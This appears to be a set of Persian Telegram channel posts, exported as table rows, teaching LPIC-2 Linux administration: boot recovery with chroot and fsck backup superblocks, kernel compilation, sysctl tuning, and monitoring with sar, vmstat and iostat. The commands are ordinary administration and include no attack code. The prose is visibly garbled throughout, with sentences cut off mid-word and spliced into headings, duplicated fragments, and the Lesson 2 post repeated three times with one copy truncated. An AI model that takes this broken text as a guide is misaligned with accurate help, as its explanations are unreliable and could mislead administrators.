touch /.autorelabel (اگر SELinux فعاله، تا لیبلها درست بشن)
exit (از chroot خارج شو)
exit (از initramfs خارج شو، سیستم ادامه بوت میده)
* **Rescue Mode با systemd:** برای ورود به حداقلترین حالت سیستمعامل (فقط سرویسهای ضروری):
... ro crashkernel=auto systemd.unit=rescue.target
اینجا میتونی با حداقل سرویسها، مشکل رو ریشهیابی و حل کنی.
#### **۳. بازگرداندن فایلسیستم از مرگ با fsck -b:**
یکی از رایجترین دلایل بالا نیامدن سرور، خراب شدن Superblock فایلسیستمه. Superblock مثل فهرست اصلی کتابه؛ اگه خراب بشه، سیستم دیگه نمیدونه فایلها کجپیدا کردن سوپربلاکهای پشتیبان:ی پشتیبان:** هر فایلسیستم ext کپیهای پشتیبان از Superblock داره. این دستور آدرسشون رو بهت میده:
mke2fs -n /dev/sda1 (به جای sda1 پارتیشن مورد نظرت رو بزن)
خروجی یه سری عدد بهت میده (مثلاً 23456, 45678, ...).
* **ترمیم با پشتیبان:** حالا با یکی از اون اعداد، فایلسیستم رو ترمیم کن:
fsck -b 23456 /dev/sda1
این یعنی داری با یه کپی سالم از Superblock، دیسک مُرده رو به زندگی برمیگردونی!
وقتی سیستمت میمیره و تو با این دستورات جادویی، نفس رو بهش برمیگردونی، وقتی میتونی مثل یه جراح، قلب لینوکس رو در حال خونریزی ترمیم کنی، اونجاست که معنی واقعی LPIC-2 رو میفهمی. تو دیگه یه ادمناجی سیستمه **ناجی سیستم** هستی!
ریاکشنها رو بکوب تا بریم برای درس بعدی که قراره وارد قلمروی شبکه بشیم و با فایروال و پکتها بازی کنیم!
هزاران آموزش شبکه و امنیت (مخصوص حرفهایها و ناجیان سیستم):
@Network_advanced
#LPIC2 #BootRecovery #GRUB2 #Initramfs #Fsck #SystemRescue #HardcoreLinux #Troubleshooting | 87 |
| 17 | LPIC‑2 | Lesson 2
### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم!
اگه فکر میکنی با apt install و yum update لینوکس رو میشناسی، سخت در اشتباهی. یه مهندس LPIC-2 کسیه که وقتی همه از کرنل پیشفرض گله دارن، خودش آستین بالا میزنه و کرنل رو دوباره مینویسه! این دیگه بازی بچهها نیست، این نفوذ به عمیقترین لایههای سیستمعامله.
#### ۱. نیشتر زدن به سورس کرنل: (Source Code Hacking)
اولین قدم؟ دانلود سورس کرنل از kernel.org. بعدش استخراج تو /usr/src/linux.
اونجا هزاران فایل و پوشه هستن. حالا ابزار اصلی: make menuconfig.
* بازی با پرچمها ([*] vs [M]): اینجا دیگه تصمیم با توئه. یه درایور خاص رو میخوای مستقیم بچسبونی به کرنل و حجمش رو زیاد کنی؟ [*] رو انتخاب کن. میخوای به صورت ماژول جداگانه لود بشه تا بتونی بعداً برش داری یا لودش کنی؟ [M] رو انتخاب کن. (مثلاً درایورهای کارت شبکه خاص، یا پروتکلهای شبکه که کمتر استفاده میشن رو [M] میگیریم).
* حذف ماژولهای مُرده: میتونی درایورهای سختافزارهایی رو که اصلاً نداری، کلاً از کرنل حذف کنی تا هم حجمش کم بشه، هم سرعت بوت بالا بره، و هم سطح حمله (Attack Surface) سیستم رو کاهش بدی. این یعنی امنیت واقعی!
#### ۲. به کار انداختن موتور کمپایل: (The Compilation Beast)
حالا که انتخابهات رو کردی، وقتشه آهن و فولاد رو به کد تبدیل کنی:
make -j$(nproc) && make modules_install && make install
* **راز $(nproc):** این دستور تعداد هستههای CPUت رو برمیگردونه. با -j داری به make میگیتمام توان پردازشی سرورور** استفاده کنه تا کمپایل توی سریعترین زمان ممکن تموم بشه. اگه سرور زیر بار سنگینه، این رو بدون -j بزن وگرنه ممکنه سیستم رو قفل کنی.
بعد از کمپایل:ل:** فایل هسته جدیدت (مثلاً vmlinuz-5.15.0-custom) تو /boot قرار میگیره. ماژولها هم میرن تو /lib/modules/5.15.0-custom/. گراب (GRUB) هم به طور خودکار باید شناساییش کنه. اگه نکرد، باید دستی update-grub یا grub2-mkconfig رو اجرا کنی.
#### **۳. تغییر هسته در حال پرواز با sysctl (Live Kernel Tuning):**
گاهی وقتا نمیتونی سرور رو ریبوت کنی. اینجا sysctl مثل یه چاقوی جراحی دقیق عمل میکافزایش سقف فایلهای باز (File Descriptors):tors):** برای دیتابیسهای بزرگ یا وبسرورهای پربازدید:
echo "fs.file-max = 1000000" >> /etc/sysctl.conf
sysctl -p (برای اعمال فواخطار:اخطار:** این عدد رو بیش از حد بالا نبر، چون هر فایل دیسکریپتور خودش مقداری RAM مصرف میکفعال کردن IP Forwarding (برای روتر کردن سرور):سرور):**
echo "net.ipv4.ip_forward = 1" >> /etc/sysctl.conf
sysctl -p
* **کنترل سوآپ (Swappiness):** اگه سیستمت الکی میره تو سوآپ و کند میشه، میتونی swappiness رو کم کنی (بین ۰ تا ۱۰۰، پیشفرض ۶۰):
echo "vm.swappiness = 10" >> /etc/sysctl.conf
sysctl -p
**نتیجه:** هرچی swappiness کمتر، هسته دیرتر سراغ فضای سوآپ میره و بیشتر سعی میکنه از RAM استفاده کنه.
وقتی هسته رو طوری تنظیم میکنی که ذرهای از منابع سیستمت هدر نره، وقتی میتونی در حال پرواز (Live) تنظیماتش رو دستکاری کنی، اونجاست که دیگه فقط یه ادمجادوگر سیستم**جادوگر سیستم** شدی! این یعنی قدرت بیحد و حصر.
ریاکشنها رو بکوب تا بریم سراغ درس ۳ که قراره با بوت لودرها کشتی بگیریم و از دل خاکستر، سیستم رو زنده کنیم!
هزاران آموزش شبکه و امنیت (مخصوص حرفهایها):
@Network_advanced
#LPIC2 #Kernel #LinuxKernel #Sysctl #Compilation #AdvancedLinux #HardcoreLinux #SystemHacking | 85 |
| 18 | LPIC‑2 | Lesson 2
### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم!
اگه فکر میکنی با apt install و yum update لینوکس رو میشناسی، سخت در اشتباهی. یه مهندس LPIC-2 کسیه که وقتی همه از کرنل پیشفرض گله دارن، خودش آستین بالا میزنه و کرنل رو دوباره مینویسه! این دیگه بازی بچهها نیست، این نفوذ به عمیقترین لایههای سیستمعامله.
#### ۱. نیشتر زدن به سورس کرنل: (Source Code Hacking)
اولین قدم؟ دانلود سورس کرنل از kernel.org. بعدش استخراج تو /usr/src/linux.
اونجا هزاران فایل و پوشه هستن. حالا ابزار اصلی: make menuconfig.
* بازی با پرچمها ([*] vs [M]): اینجا دیگه تصمیم با توئه. یه درایور خاص رو میخوای مستقیم بچسبونی به کرنل و حجمش رو زیاد کنی؟ [*] رو انتخاب کن. میخوای به صورت ماژول جداگانه لود بشه تا بتونی بعداً برش داری یا لودش کنی؟ [M] رو انتخاب کن. (مثلاً درایورهای کارت شبکه خاص، یا پروتکلهای شبکه که کمتر استفاده میشن رو [M] میگیریم).
* حذف ماژولهای مُرده: میتونی درایورهای سختافزارهایی رو که اصلاً نداری، کلاً از کرنل حذف کنی تا هم حجمش کم بشه، هم سرعت بوت بالا بره، و هم سطح حمله (Attack Surface) سیستم رو کاهش بدی. این یعنی امنیت واقعی!
#### ۲. به کار انداختن موتور کمپایل: (The Compilation Beast)
حالا که انتخابهات رو کردی، وقتشه آهن و فولاد رو به کد تبدیل کنی:
make -j$(nproc) && make modules_install && make install
* راز $(nproc): این دستور تعداد هستههای CPUت رو برمیگردونه. با -j داری به make میگیتمام توان پردازشی سرورور** استفاده کنه تا کمپایل توی سریعترین زمان ممکن تموم بشه. اگه سرور زیر بار سنگینه، این رو بدون -j بزن وگرنه ممکنه سیستم رو قفل کنی.
بعد از کمپایل:ل:** فایل هسته جدیدت (مثلاً vmlinuz-5.15.0-custom) تو /boot قرار میگیره. ماژولها هم میرن تو /lib/modules/5.15.0-custom/. گراب (GRUB) هم به طور خودکار باید شناساییش کنه. اگه نکرد، باید دستی update-grub یا grub2-mkconfig رو اجرا کنی.
#### ۳. تغییر هسته در حال پرواز با sysctl (Live Kernel Tuning):
گاهی وقتا نمیتونی سرور رو ریبوت کنی. اینجا sysctl مثل یه چاقوی جراحی دقیق عمل میکافزایش سقف فایلهای باز (File Descriptors):tors):** برای دیتابیسهای بزرگ یا وبسرورهای پربازدید:
echo "fs.file-max = 1000000" >> /etc/sysctl.conf
sysctl -p (برای اعمال فواخطار:اخطار: این عدد رو بیش از حد بالا نبر، چون هر فایل دیسکریپتور خودش مقداری RAM مصرف میکفعال کردن IP Forwarding (برای روتر کردن سرور):سرور):
echo… | 1 |
| 19 | LPIC‑2 | Lesson 2
درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management)**، این بار با چاشنی وحشیگری بیشتر و جزئیات دقیق، آماده برای تلگرام.
---
### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم!
اگه فکر میکنی با apt install و yum update لینوکس رو میشناسی، سخت در اشتباهی. یه مهندس LPIC-2 کسیه که وقتی همه از کرنل پیشفرض گله دارن، خودش آستین بالا میزنه و کرنل رو دوباره مینویسه! این دیگه بازی بچهها نیست، این نفوذ به عمیقترین لایههای سیستمعامله.
#### ۱. نیشتر زدن به سورس کرنل: (Source Code Hacking)
اولین قدم؟ دانلود سورس کرنل از kernel.org. بعدش استخراج تو /usr/src/linux.
اونجا هزاران فایل و پوشه هستن. حالا ابزار اصلی: make menuconfig.
* بازی با پرچمها ([*] vs [M]): اینجا دیگه تصمیم با توئه. یه درایور خاص رو میخوای مستقیم بچسبونی به کرنل و حجمش رو زیاد کنی؟ [*] رو انتخاب کن. میخوای به صورت ماژول جداگانه لود بشه تا بتونی بعداً برش داری یا لودش کنی؟ [M] رو انتخاب کن. (مثلاً درایورهای کارت شبکه خاص، یا پروتکلهای شبکه که کمتر استفاده میشن رو [M] میگیریم).
* حذف ماژولهای مُرده: میتونی درایورهای سختافزارهایی رو که اصلاً نداری، کلاً از کرنل حذف کنی تا هم حجمش کم بشه، هم سرعت بوت بالا بره، و هم سطح حمله (Attack Surface) سیستم رو کاهش بدی. این یعنی امنیت واقعی!
#### ۲. به کار انداختن موتور کمپایل: (The Compilation Beast)
حالا که انتخابهات رو کردی، وقتشه آهن و فولاد رو به کد تبدیل کنی:
make -j$(nproc) && make modules_install && make install
* **راز $(nproc):** این دستور تعداد هستههای CPUت رو برمیگردونه. با -j داری به make میگیتمام توان پردازشی سرورور** استفاده کنه تا کمپایل توی سریعترین زمان ممکن تموم بشه. اگه سرور زیر بار سنگینه، این رو بدون -j بزن وگرنه ممکنه سیستم رو قفل کنی.
بعد از کمپایل:ل:** فایل هسته جدیدت (مثلاً vmlinuz-5.15.0-custom) تو /boot قرار میگیره. ماژولها هم میرن تو /lib/modules/5.15.0-custom/. گراب (GRUB) هم به طور خودکار باید شناساییش کنه. اگه نکرد، باید دستی update-grub یا grub2-mkconfig رو اجرا کنی.
#### **۳. تغییر هسته در حال پرواز با sysctl (Live Kernel Tuning):**
گاهی وقتا نمیتونی سرور رو ریبوت کنی. اینجا sysctl مثل یه چاقوی جراحی دقیق عمل میکافزایش سقف فایلهای باز (File Descriptors):tors):** برای دیتابیسهای بزرگ یا وبسرورهای پربازدید:
echo "fs.file-max = 1000000" >> /etc/sysctl.conf
sysctl -p (برای اعمال فواخطار:اخطار:** این عدد رو بیش از حد بالا نبر، چون هر فایل دیسکریپتور خودش مقداری RAM مصرف میکفعال کردن IP Forwarding (برای روتر کردن سرور):سرور):**
echo "net.ipv4.ip_forward = 1" >> /etc/sysctl.conf
sysctl -p
* **کنترل سوآپ (Swappiness):** اگه سیستمت الکی میره تو سوآپ و کند میشه، میتونی swappiness رو کم کنی (بین ۰ تا ۱۰۰، پیشفرض ۶۰):
echo "vm.swappiness = 10" >> /etc/sysctl.conf
sysctl -p
**نتیجه:** هرچی swappiness کمتر، هسته دیرتر سراغ فضای سوآپ میره و بیشتر سعی میکنه از RAM استفاده کنه.
وقتی هسته رو طوری تنظیم میکنی که ذرهای از منابع سیستمت هدر نره، وقتی میتونی در حال پرواز (Live) تنظیماتش رو دستکاری کنی، اونجاست که دیگه فقط یه ادمجادوگر سیستم**جادوگر سیستم** شدی! این یعنی قدرت بیحد و حصر.
ریاکشنها رو بکوب تا بریم سراغ درس ۳ که قراره با بوت لودرها کشتی بگیریم و از دل خاکستر، سیستم رو زنده کنیم!
هزاران آموزش شبکه و امنیت (مخصوص حرفهایها):
@Network_advanced
#LPIC2 #Kernel #LinuxKernel #Sysctl #Compilation #AdvancedLinux #HardcoreLinux #SystemHacking | 1 |
| 20 | LPIC‑2 | Lesson 1
از اینجا به بعد دیگه بازی با دستورات ls و cd تموم شد. وارد دنیایی میشیم که درایورها و وقفههای سختافزاری (Interrupts) باید جلوی تو لنگ بندازن. اینجا LPIC-2 هست؛ جایی که ما لینوکس رو نمیرونیم، ما لینوکس رو کالبدشکافی میکنیم.
از درس ۱ شروع میکنیم، اما با غلظتی که مغزت بوی سیلیکون سوخته بده.
---
### درس ۱: پایش سیستم و پیشبینی ظرفیت (Capacity Planning) در سطح جانی!
یک ادمین معمولی وقتی سرور کند میشه top میزنه و نگاه میکنه. یک مهندس LPIC-2 مثل تو، باید بتونه قبل از اینکه کاربر حتی بفهمه سرور قراره کند بشه، گلوگاه (Bottleneck) رو پیدا و خفه کنه.
#### **۱. کالبدشکافی با sar (System Activity Reporter):**
ابزار sar عصای دست توئه. این ابزار دادهها رو از /proc میکشه و در فایلهای باینری در /var/log/sa/ ذخیره میکنه.
تحلیل حافظه در گذشته:ه:** فرض کن دیشب ساعت ۳ صبح سرور کرش کرده. با این دستور برگرد به عقب:
sar -r -f /var/log/sa/sa$(date +%d -d "yesterday")
اینجا دنبال ستون %commit بگرد. اگه این عدد از ۱۰۰ بالاتر رفته، یعنی سیستم بیش از حدِ توانِ واقعیش (RAM + Swap) به پروسسها وعده فضا داده و دیشب "OOM Killer" اومده و پروسسها رو سلاخی کرده.
#### **۲. شکارچی گلوگاه: vmstat و وقایع پشت پرده:**
اجرای vmstat 1 فقط چند تا عدد نیست، ضربان قلب سیستمه.
* **ستون cs (Context Switches):** اگه این عدد به طور ناگهانی بالا بره (مثلاً بالای ۱۰۰ هزار)، یعنی CPU داره دیوونه میشه چون مدام مجبور ه بین پروسسهای مختلف سوئیچ کنه و عملاً هیچ کار مفیدی انجام نمیده.
* **ستون in (Interrupts):** بالا بودن این عدد یعنی یه قطعه سختافزاری (مثل کارت شبکه زیر حمله DDoS یا یه دیسک خراب) داره مدام به CPU سیگنال میفرسته و وقتش رو تل۳. شکنجه دیسک با iostat:یسک با iostat:**
وقتی دیسک کند میشه، سیستم فلج میشه. این دستور رو بزن: iostat -xz 1.
* **ستون await:** این حیاتیترین عدده. یعنی میانگین زمانی (به میلیثانیه) که یک درخواست I/O منتظر میمونه تا انجام بشه. اگه این عدد بالای ۱۰-۱۵ میلیثانیه بره، دیسکهای تو داستون %util:
* **ستون %util:** اگه این ۱۰۰٪ باشه یعنی دیسک بندری میزنه و دیگه هیچ پهنای باندی نداری. وقتشه RAID رو ارتقا بدی یا ب۴. پیشبینی ظرفیت (The Engineering Art): Engineering Art):**
مهندس واقعی با حدس و گمان کار Linear Regression*Linear Regression** استفاده کنی.
* فایلهای sa رو به متن تبدیل کن: sadf -d /var/log/sa/saXX -- -r > mem_usage.csv.
* این دادهها رو توی اکسل یا با یه اسکریپت پایتون تحلیل کن. اگه نرخ رشد مصرف RAM ماهانه ۵٪ باشه و تو الان ۲۰٪ فضای خالی داری، یعنی دقیقاً ۴ ماه دیگه سرورِ تو میترکه. این یعنی Capac۵. ابزارهای مدرنتر: ابزارهای مدرنتر:**
یادت باشه collectd و Prometheus هم هستن، اما در امتحان LPIC-2 و در شرایطی که شبکه قطعه، تو فقط خودتی و sysstat. پس باید بتونی با sadc و sa1/sa2 دستی آمار جمع کنی.
اگه فکر کردی ادمین بودن یعنی فقط نصب کردن پکیج، اشتباه کردی. ادمین لینوکس یعنی جراحِ ثانیهها و بایتها. وقتی بقیه دارن تو تاریکی دنبال مشکل میگردن، تو با تحلیل sar نور میتابونی به قلب سیستم.
ریاکشن رو بترکون تا بریم سراغ درس ۲ که قراره هسته لینوکس رو تیکه پاره کنیم!
هزاران آموزش شبکه و امنیت (مخصوص حرفهایها):
@Network_advanced
#LPIC2 #SysAdmin #PerformanceTuning #CapacityPlanning #LinuxEngineering #Monitoring #HardcoreLinux | 131 |
